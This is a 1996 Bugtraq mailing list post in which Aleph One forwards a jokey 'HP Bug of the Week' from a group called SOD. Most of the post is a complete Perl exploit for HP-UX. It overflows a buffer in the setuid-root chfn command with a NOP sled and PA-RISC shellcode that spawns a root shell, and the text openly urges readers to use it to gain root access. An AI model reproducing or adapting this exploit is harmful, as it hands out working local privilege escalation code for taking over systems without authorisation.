Bugtraq mailing list archives
the HP Bug of the Week!
From: aleph1 () dfw net (Aleph One)
Date: Mon, 9 Dec 1996 02:47:46 -0600
From our friends at SOD:
This week: the continuing saga of buffer overflows in setuid root programs Amid the struggle of the terrible workaday week, among the lost broken-hearted keypunching drones, alongside the workers in the dreaded server farm, Our Hero bravely sends the legally forbidden datastream across the burning wires toward a cold and lifeless shell of a shell. The electrons twist! The binary bits battle! The data bus swerves sharply to avoid hitting the eclectic keywords! Was the script executed in time to save Our Hero and his lovely Mistress? Were the exploitable programs still enabled setuid root? Will the buffers spill onto the stack and leave way to run a small semblance of illicit code? Of course they will, and you don't have to tune in next week to find out, either. This week, the chfn command happily runs some code for us as root, and Otto Sync joins us as an honorary Scriptor with his exploits written especially for HP's OpenCall Service Control Point platform for SS7 telephony use -- oh, I don't know how well Alcatel is going to like this one! So snarf it, pop it open, and suck it down, and as always remember to start clicking your way to root access with scripts from those Superhero kind of folks at SOD. _________________________________________________________________ Caveat Emptor of.chfn changes uid's, too! script for this week _________________________________________________________________ #!/usr/bin/perl use FileHandle; sub h2cs { local($stuff)=@_; local($rv); while($stuff !~ /^$/) { $bob=$stuff; $bob =~ s/^(..).*$/$1/; $stuff =~ s/^..//; $rv.=chr(oct("0x${bob}")); } return $rv; } open(PIPE,"uname -r|"); chop($rev=<PIPE>); close(PIPE); $rev =~ s/^.*\.(.*)\..*$/$1/; if ($rev eq "10") { $offset=2070; $prealign="AA"; $postalign="PPPP"; $pcoq=h2cs("7b03A013"); } else { $offset=2070; $prealign="AA"; $postalign="PPPP"; $pcoq=h2cs("7b033013"); } $nop=h2cs("08210280"); $code=""; $code.=h2cs("34160506"); # LDI 643,r22 $code.=h2cs("96d60534"); # SUBI 666,r22,r22 $code.=h2cs("20200801"); # LDIL L%0xc0000004,r1 $code.=h2cs("e420e008"); # BLE 4(sr7,r1) $code.=h2cs("0b5a029a"); # XOR arg0,arg0,arg0 $code.=h2cs("e83f1ffd"); # BL .+8,r1 $code.=h2cs("08210280"); # NOP $code.=h2cs("34020102"); # LDI 129,rp $code.=h2cs("08410402"); # SUB r1,rp,rp $code.=h2cs("60400162"); # STB r0,177(rp) $code.=h2cs("b45a0154"); # ADDI 170,rp,arg0 $code.=h2cs("0b390299"); # XOR arg0,arg0,arg0 $code.=h2cs("0b180298"); # XOR arg0,arg0,arg0 $code.=h2cs("341604be"); # LDI 607,r22 $code.=h2cs("20200801"); # LDIL L%0xc0000004,r1 $code.=h2cs("e420e008"); # BLE 4(sr7,r1) $code.=h2cs("96d60534"); # SUB 666,r22,r22 $code.=h2cs("deadcafe"); # Illegal instruction -- dump core if exec fails $data="/bin/sh."; # Data stuff $codedata=$code.$data; $num=int(($offset-length($code)-length($data)-4)/4); $pre="$nop"x$num; $of=$prealign; $of.=$pre.$code.$data.$postalign.$pcoq; exec("/usr/bin/chfn","$of"); Aleph One / aleph1 () dfw net http://underground.org/ KeyID 1024/948FD6B5 Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01
Current thread:
- the HP Bug of the Week! Aleph One (Dec 09)